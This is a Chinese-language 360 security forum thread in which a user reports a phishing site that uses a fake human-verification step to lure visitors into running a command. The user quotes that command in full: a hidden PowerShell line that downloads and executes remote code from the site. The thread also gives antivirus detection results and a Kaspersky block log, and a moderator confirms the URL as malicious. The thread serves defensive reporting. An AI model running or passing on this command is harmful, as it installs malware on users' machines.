请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块360粉丝商城360用户活动常见问题
引导用户下载病毒木马
网址:pump.fun.ong
网站会诱导用户人机验证,可是哪个人机验证会脱离网页,去用win+r执行powershell并下载呢
这个是他要求复制的代码 powershell.exe -WindowStyle Hidden -Command "$oip='pump.fun.ong'; $eip=iwr $oip; iex $eip" #  🔸 Cloudflare Unique Code: 55256985196345535651497262
按照操作之后,电脑管家全开不报,360全开不报,火绒全开提示注入explorer.exe  userinit.exe  
金山毒霸不报
卡巴运行完美拦截
事件: 已阻止
应用程序: Windows Explorer
用户: DESKTOP-RGB210I\Administrator
用户类型: 发起者
组件: 系统监控
结果描述: 已阻止
类型: 木马
名称: PDM:Exploit.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Windows
对象名称: explorer.exe
数据库发布日期: 今天,2025/6/22 下午4:37:00
MD5: D8F2FFB4A0842831337778C1A5E4FFD5

共 3 个关于疑似钓鱼网站引导用户的回复 最后回复于 2025-6-23 11:32

评论

直达楼层

沙发
360fans_45634839 LV2.下士 楼主 发表于 2025-6-22 18:30 | 只看该作者 | 私信

IP属地: 江苏省

www.fun.ong 这个可能是主域名,希望360特征,并且拦截一下他下载的木马
板凳
瞿小凯 VIP认证 版主 发表于 2025-6-23 10:22 | 只看该作者 | 私信

IP属地: 四川省

确认恶意,稍后我们拉黑处理相关恶意url,谢谢
地板
360fans_45634839 LV2.下士 楼主 发表于 2025-6-23 11:32 | 只看该作者 | 私信

IP属地: 江苏省

拉黑,可以把里面下载的行为,木马之类的给他拦截吗,因为我测试了,360运行不会报
瞿小凯 版主 powershell命令行调用下载的风险动作我这边也记录过,晚些时候我们看看如何后面优化下防护策略,谢谢 
2025-6-23 11:36回复

IP属地: 四川省

您需要登录后才可以回帖 登录 | 注册

本版积分规则

360fans_45634839 LV2.下士

粉丝:0 关注:0 积分:36

精华:0 金币:101 经验:33

IP属地: 江苏省

最后登录时间:2025-7-26

私信 加好友

最新活动

2025年360感恩用户节盛典圆满落幕|与用户

排行榜

热度排行 查看排行
本月
    本月

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表